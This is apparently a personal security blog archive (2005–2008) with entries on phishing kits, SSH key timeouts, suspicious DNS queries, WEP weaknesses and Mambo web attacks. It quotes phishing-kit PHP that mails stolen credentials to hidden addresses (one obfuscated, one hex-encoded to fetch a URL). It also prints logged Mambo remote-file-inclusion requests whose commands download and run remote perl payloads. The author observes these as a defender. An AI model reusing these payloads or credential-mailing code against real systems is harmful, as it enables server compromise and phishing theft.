Sometimes spammers / scammers are so stupid it is amusing again. I just received several mails with the php-source for the result-collecting and mailing script for the phishing site. Interesting code snippets:mail("dongmopascal@gmail.com",$subject,$message,$headers);But, the scammer gets scammed too. Look at this code snippet:$ar=array("0"=>"m","1"=>"i","2"=>"e","3"=>"r","4"=>"d","5"=>"a","6"=>"0", "7"=>"0","8"=>"@","9"=>"h","10"=>"o","11"=>"t","12"=>"m","13"=>"a","14"=>"i", "15"=>"l.es"); $to=$ar['0'].$ar['1'].$ar['2'].$ar['3'].$ar['4'].$ar['5'].$ar['6'].$ar['7']. $ar['8'].$ar['9'].$ar['10'].$ar['11'].$ar['12'].$ar['13'].$ar['14'].$ar['15']; mail($to,$subject,$message,$headers);Takes a bit of decoding, but it seems copies are sent to mierda008@hotmail.es.
The same spammer also mailed a different script with the same function. This script is clear on where to put the dropbox address://This is your email $to = "savepam@gmail.com" ; // Write your emailBut in the next lines.../* EnD Configuration */ $victimIP = pack("H*", "687474703a2f2f667265657363616d732e33782e726f2f656d61696c2e706870"); $DetailsIP = file_get_contents($victimIP, "r"); $DetailsIP = pack("H*", $DetailsIP);$victimip unpacks to http://freescams.3x.ro/email.php so the scammer of the scammer can 'maintain' this and change dropbox if needed. Currently that shows a page which I think says that the page does not exist. The result would be used in the code:$arr=array($to, $DetailsIP); foreach ($arr as $to){mail($to, $subj, $msg, $from);} header("Location: done.html?cmd=_login-run");You can't trust a good scammer these days, it seems...
2008-05-27 (#)
I always used ssh-agent to remember keys for me, but lately I started adding a timeout to keys so they don't get remembered indefinitely. Especially on my laptop: what if it gets stolen, the keys are still valid when it comes out of suspend mode. So now I type ssh-add -t 3600 so they are only valid for one hour. But, that is still not ideal as I need to remember that keys might be forgotten when I click on a button or menuitem in fvwm to start a new xterm-with-ssh. Otherwise I may be thrown out directly from the session or asked for a password or passphrase, depending on the SSH security settings. So, fvwm functions to the rescue:
AddToFunc SSHUR4 "I" Exec if ! ssh-add -l > /dev/null; then ssh-add -t 600 .ssh/id_dsa <&- 2>/dev/null ; fi; uxterm -fg black -bg '#e0e0e0' -geom 80x40 -title 'slogin $0' -vb -e ssh -e none $0 &
Now I can just use SSHR4 host.name and it will ask for the ssh passphrase when needed. In an fvwm menu item: AddToMenu Remote-Logins "idefix.net%mini-freebsd.xpm%" SSHR4 idefix.net and in an fvwm button: *FvwmButtons(Title idefix, Icon mini-freebsd.xpm, Action 'SSHUR4 idefix.net' )
2008-05-26 (#)
I get mail from logcheck daily and the last week or so on one nameserver I keep seeing variations ofMay 26 09:37:15 gosper named[895]: denied query from [66.238.93.161].26906 for "." NS/IN May 26 09:56:16 gosper named[895]: denied query from [211.72.249.201].13819 for "." NS/INAll the time those 2 IPv4 addresses. With one or two tries it might be a simple attempt to fingerprint my nameservers but at this rate it seems like an attempt at a denial of service attack. Interesting is that the amount of requests is exactly the same for both IPs. 66.238.93.161 and 211.72.249.201 are registered to parts of Asus computers.. where I recently downloaded a bios update in order to fix some acpi problems. Related?
2008-03-25 (#)
Not so subtle advice from Sans in the latest Sans newsbites:Don't open email attachments unless you were expecting them. Send a note back and ask the person to embed the text in a simple email. This matters to your career. The people who break this rule will be the reason their organization's data are stolen and they won't be able to hide.
2008-03-10 (#)
I found an interesting tidbit in the apache-config today: after setting the AuthLDAPBindPassword directive I could find the password in the server-info output. Which was to be expected, but still an interesting side-effect.
2007-10-26 (#)
And in trying to firewall IPv6 I found that INPUT and FORWARD are really separate. From the docs:the built-in chains INPUT (for packets coming into the box itself), FORWARD (for packets being routed through the box), and OUTPUT (for locally-generated packets).So if I want to set a policy for both the local machine and the machines behind it I need to set those rules in both INPUT and FORWARD.
2007-10-03 (#)
It seems Eircom broadband missed the news about WEP being dead (pdf) and WEP being really dead. From The Register: Eircom wireless security flaw revealedEircom's director of communications Paul Bradley defended the protocol, however, saying "WEP is an industry standard protocol used by telecoms providers around the world."Well Paul, just because all the stubborn kids do it, does not mean it is the right choice.
2007-10-02 (#)
Looking for something else I found Blue Box: The VoIP Security Podcast which talks about (lack of) VoIP security. I love the name, it refers to attacks on telephony systems being something of all ages, independent of the actual technology. The new age of VoIP just makes new attacks possible. And with different queries I found Blue Boxing Comes to VoIP in the wired archives. "Phiber Optik" has written a module for Asterisk to make it accept MF (and be bluebox-able).
2007-09-16 (#)
I kept seeing things in the logs like Sep 16 05:52:39 gosper named[779]: denied query from [143.215.129.200].22632 for "www.capitalone.com" A/IN, all from 143.215.129.200, 143.215.129.102, 143.215.129.43 without any explanation to be found on the web. The name guesses some sort of study of DNS answers, and all queries seem to be for phishing targets, but several thousand answers "your query was denied" doesn't make them stop asking. Solution: iptables -t filter -I INPUT 8 -j REJECT --source 143.215.129.0/24 --protocol udp --dport 53 --reject-with icmp-admin-prohibited. Mail to noc@ was never answered.
2007-04-04 (#)
In wireless security, WEP is now 'broken harder'. Cryptography researchers at the Technische Universität Darmstadt have researched new attacks and written a tool that has a probability of 50% of finding a 104-bit WEP key within 1 minute.
2007-03-20 (#)
Nice newsbit: Aussies fuming over 'frozen' LG digitals TVs.. digital content making the software in certain digital receivers from LG freeze up. When a digital bitstream (data) can make the decoding software freeze, it means (to me) the decoding software has not enough separation of data and code. Things like table-lookups running out of space can make this happen.
2006-07-24 (#)
Paul McNamara writes in an article Could that be the wireless police knocking? about a condominium/hotel developer in Tucson, Arizona, US including in the regulations for owning a condo that wireless networks have to be secured. I'm not sure I see why the developer would get involved in this subject unless they also happen to be the ISP (in which case I would consider 'no choice in ISP' a big downside to the whole deal). Wireless security needs to be addressed. In the right place: informing the public about it. Having security by default (like in siemens gigaset access points) and not hiding behind a load of unexplained acronyms in a page of the manual (seen in a recent linksys manual). I really don't think a homeowners association is the place. Although it does fit the profile of the 'homeowners associations sticking their nose into everything' which seem on the rise in the US. They make the homeowners association of the flat I lived in before look very sane (even when they did do dumb things on account of 'saving property value').
2006-07-15 (#)
From Bruce Schneiers Crypto-Gram: Template for News Stories on Government Data Gathering. A bit of a Dilbert-type joke: too funny and too recognizable.
2006-07-13 (#)
Ik kwam op de site van Walter Belgers terecht en verdwaalde daar in het archief hackers in de media met heel veel kranteknipsels uit de jaren dat ik ook geinterreseerd raakte in computers en beveiliging. Mooi om het allemaal weer eens terug te lezen, ook de ontwikkeling van de wetgeving in Nederland en de uitspraken van professor Herschberg.
2006-03-15 (#)
Updated the document about how I configure SSH to thwart password guessing because I finally took the time of finding the pam equivalent of AllowGroups and DenyGroups.
2006-03-09 (#)
Fun story: Peter Cochrane's Blog: Snooping on a BlackBerry fool. Peter Cochrane writes about being on a train and being able to listen in to half of a (loud) pre-sales meeting call, with all details being shouted into the train carriage for everyone to enjoy. A bit of very British humour in it, and a good story about both the annoyance of mobile phones in public places and the privacy/security implications. Found via Bruce Schneier: The Analog Hole / security risks of talking loudly.
2006-02-19 (#)
And 52 hours after my afterthought about mentioning the magic phrase for a web worm the first attempt: h58737.serverkompetenz.net - - [18/Feb/2006:23:49:09 +0100] "GET /index.php?_REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://www.microsofti.li/tool.gif?& cmd=cd%20/tmp/;lwp-download%20http://www.microsofti.li/sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*? HTTP/1.0" 200 3090 "-" "Mozilla/5.0"
2006-02-16 (#)
Finally fetched the source of the mambo exploit I mentioned before. It does a Google search for "by mambo" and this phrase can be found using google on The Virtual Bookcase exactly once, in the page about Books by Mambo Ama Mazama. Interesting source to read.. a bit of php which calls itself Defacing Tool 2.0 by r3v3ng4ns and a bit of perl which starts an ircbot on server bsd.cuti.cz which allows the usual stuff like taking over the machine and doing portscans. Afterthought: will this host now also get hit because it contains the magic phrase?
2006-02-14 (#)
On The Virtual Bookcase I get loads and loads of requests looking like (broken up for readability): "GET /book/byauthor/index.php? _REQUEST[option]=com_content& _REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path=http://www.thriftysix.co.uk/tool25.txt ?&cmd=cd%20/tmp/;wget%20http://www.thriftysix.co.uk/logs.txt; perl%20logs.txt;rm%20-rf%20logs.txt*? HTTP/1.0" 404 2348 "-" "Mozilla/5.0". All fail ofcourse (that's how I notice them). It seems this is a Mambo exploit in use. Funny thing is I never use Mambo on any site.
I have tried several times to get that tool25.txt to have a look, but it always returns 'The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later.'
2005-12-21 (#)
I wrote a bit about how I configure OpenSSH to make it less susceptible to break-in via password guessing.
Older news items for tag security ⇒